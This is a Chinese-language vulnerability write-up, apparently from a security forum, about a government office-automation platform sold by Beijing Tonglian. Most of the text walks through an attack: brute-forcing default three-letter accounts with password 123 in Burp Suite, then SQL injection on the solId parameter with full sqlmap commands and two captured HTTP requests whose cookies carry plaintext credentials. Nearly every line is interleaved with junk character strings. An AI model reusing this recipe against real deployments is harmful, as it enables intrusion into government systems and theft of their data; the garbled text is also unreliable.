|
. ?$ N+ U$ F. f: J
5 o H) j5 T' R " W+ P# Y: v4 [8 P# q
8 N, g4 M5 n" @- F+ c6 g9 [ 平台简介:
. I6 r+ N) v. _8 P& R ! W1 E# A& A; v9 T3 p& P' @; X
* R9 x7 @5 V8 |0 j 0 [# t! s) b4 d2 U* V& G4 y% H- H
4 |1 R8 i$ D+ D: A. x3 o9 ?2 m# X& W+ Z8 O
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
# }7 P' A7 A3 W2 m" K同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
9 K) i% u' n( J0 o同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!# d; k1 @0 k) E4 I% k3 D; X7 R
& W2 r ?3 q1 f4 [2 b/ A1 D2 G3 v' _; ?9 s. l3 e3 @
. Q; J$ P5 P; m6 |4 i
9 V4 P8 l! Z- b. P+ @ p! r
: a: s8 l" d' t+ Q& s6 w 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:7 _& J0 Y6 w; o9 \, b! V
9 D w9 ~. O+ q) j4 c
+ n0 a1 o- e K6 Q% j2 H% A& s4 ]
5 M8 p9 t$ v1 j9 R/ f
, R1 D8 H( |: w/ U0 Z' O a
I+ F/ ]% o* e+ {2 V1 o" B http://1.1.1.1:7197/cap-aco/#(案例2-)
! m9 j2 G [' z9 x2 K# U+ B/ y 9 B5 \" U8 C+ f9 d! P. n
6 u I7 c% R2 b) `
http://www.XXOO.com (案例1-官网网站)
( L+ K# d1 F0 x3 c
5 w1 L# z9 y$ {1 b0 p5 J, u8 w4 ^* n3 D- Y# O$ |/ ]/ M
6 l; }7 ?6 v4 r; X+ h6 F+ S
4 y3 v- n" N$ X, x3 Q2 O1 ?
2 p* _; C! y: }+ w0 B `( w4 y
漏洞详情:
: Y- `7 a; B" G 7 c) e* S$ O6 l6 V8 c; w9 A8 r* \
! z" f8 {8 g5 c; E2 h8 X I' v! z 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
5 S. D! ~$ J1 i# U
- Q8 ^7 {& {+ e% J7 I. C
, c2 I# y5 i3 g$ ~; V0 u- b _* g 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
* A3 \4 {* P; f$ s7 m
" `( S- u* V# P3 p# C' q
$ B% F8 w* p% ]. c0 `# c- C1 K
) k: [ l5 U( | 7 w: T& v* ^$ M; U3 c" p% t
* h9 J1 v: V+ k1 G! O7 P1 q
5 [, M0 C% I4 ^" Z
* c# H& q: f5 x1 T. ^' Y0 ]6 Y4 S) e6 |( q
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
2 u- |' H' s0 k% j0 u : l0 f+ `5 w1 H; r( |9 ]
7 `% _& c5 g r# \ 1、案例1-官方网站
; k7 C$ @/ S2 _; o$ T7 q: j , D$ c# m3 j9 D% o
% E. W6 `: w# R8 |
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.15 M. A2 p# T2 j: D
: K7 @6 v3 y0 n1 b; h+ i3 k
0 T# R0 b) s2 s' l9 C! b
Host: www.XXOO.com
7 \- j9 x, W) x# | F2 j, P2 M% x0 I
7 B* V2 |& h% a+ V, F4 i/ S
0 o$ z* C/ m( j& Y$ W' {" ]6 x Proxy-Connection: Keep-Alive
0 P, N1 w; ^+ w, F / Y# }% W- {8 {( Q- F+ ?
- V2 @' N9 m; p7 h. s& Y Accept: application/json, text/javascript, */*; q=0.014 V! S6 T( I4 g1 h1 H# n* s
4 v$ `1 Y+ [6 ]; D3 a
% J. {' c5 i/ c' ]9 y
Accept-Language: zh-CN) G9 F6 A `! e) h5 V
( s& j h; Q- ]0 K7 r
7 ~7 Q q( P) |4 d2 [4 A% T$ {5 _ Content-Type: application/json: J! r \3 l- a5 d* q' X
$ f5 b. k% ] N: M9 v, m
8 {" _' w! R5 y- v. W) r. Q) y User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
1 f" o# v8 A$ n4 f$ Z( ] |
$ {) Z4 K, K% e$ R$ P7 i3 [8 T8 C' L' W6 x
X-Requested-With: XMLHttpRequest4 p. j! x1 z8 \+ ^; p N/ H
# H3 N, O9 Q0 W( X6 m8 J
8 u: P% w4 c# _2 E% d! s j Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
9 H' x8 {6 Y' J. ?& ]/ _7 s! I, D - O* |7 X0 L5 T+ L' ~7 @
% i U0 i, p$ N9 {+ @$ g' h
Accept-Encoding: gzip, deflate, sdch
' s! t$ {" I6 @( {: i5 b
1 n2 [+ a' [ L: l c" c& `9 A+ i) J+ i; ^7 V3 B) I
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
]" O A9 O+ K S ) N+ ^1 B: e+ q4 t' X: Q/ m+ K
% ]% o# \5 n- w+ F 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:2 W8 p4 W' O) t- _) o: R
/ p/ ^2 L n& g% z8 [
& `' f0 M& ?3 X
2 m" _- w7 ~* U5 N
' [7 e. c5 H% i9 C
! o3 ^( ~ U0 |: ]" [ s 6 V" P& m) x/ r" Q
9 g: m+ \8 r( g
" @2 `3 D8 y3 v6 x' r7 c * Z8 S6 P. k/ l( u+ q
; H% }7 K& A! C
2 Q) A5 f/ {9 a6 k ( {0 m% I, A' w& ?1 G/ w b
2 A, ?9 N& C9 c( b: N
4 _" N9 F% \3 G5 S; I$ r! Q1 j* `
% g& @% c2 h9 {- P * I/ y9 q, O" B1 `6 m* I) u
- T1 P/ w/ g+ a0 J/ _ 2、案例2-某天河云平台% u" N7 b2 x3 I0 t& h8 K/ M' }2 d
! k3 I1 e8 m& @* Y
' a" b. q. {% @: H% N, ? GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1. ?% L2 ^1 _) ~
0 e0 S2 D: `0 H. K/ f, m7 t; g5 j* B' y# M, o
Host: 1.1.1.:7197& Q7 `6 G0 F, H& F
& u: B3 U9 h1 K( b" J
( ?5 y3 Q0 f2 h. s0 M1 k6 `
Accept: application/json, text/javascript, */*; q=0.01! p$ U. T3 s$ F" N0 l# @
- ~% V! U% e9 S4 t8 B/ t2 w
; b% L9 s# ?( w4 @! ~2 a- {
X-Requested-With: XMLHttpRequest) K- g3 V- } c" J7 v' w4 U5 I
( p( }# e3 G" F7 j: ~/ N- |' `5 @7 P& O7 n' m" z% W. P5 j; E
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0+ M0 P9 w% a7 ~' d7 v; D U% i4 T R
: y1 Y: ~6 F4 x
( R9 L2 V9 O0 d1 c; r7 S Content-Type: application/json
* J# H0 z: S2 G8 P( i ' B& d; s8 t8 X" d5 x3 ~
2 l% V! { F+ \; A
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10089 p" e( U3 g$ j& Y
" S2 X6 T& L9 C" u5 H' K+ {
% q' c% v6 ]6 T( ~& W3 a" {; f1 ]8 \ Accept-Language: zh-CN,zh;q=0.8
, ~$ f" w% k. x7 `" A7 U6 U* I1 E
- V' g' y m9 |% i- ^& K0 z3 O1 d- v& |, A( h/ h1 d
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
- [" d9 ?- O0 m1 n
. q$ u' [5 C3 n/ a/ r" k* y' x
$ I, w' g' {# v- v& L( I( T- {6 m Connection: close- R1 m9 {! g2 P
. g r% V0 Q$ k3 J6 e
' x8 G+ W0 C7 u! e ]0 Z 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
2 a- C) `/ I& Y9 | \( t+ K" _
$ W. \* s5 k2 C1 C" K- K. Z9 L c2 T+ q1 v2 O( N; R, A
3 `" |( P' e Y/ O5 I }
$ Z" X0 N/ Y1 |5 T& o' W* s5 D! g
* `9 w3 x) n! c& T6 ^5 s* L
& x" N. ~ G$ t, f9 P- V |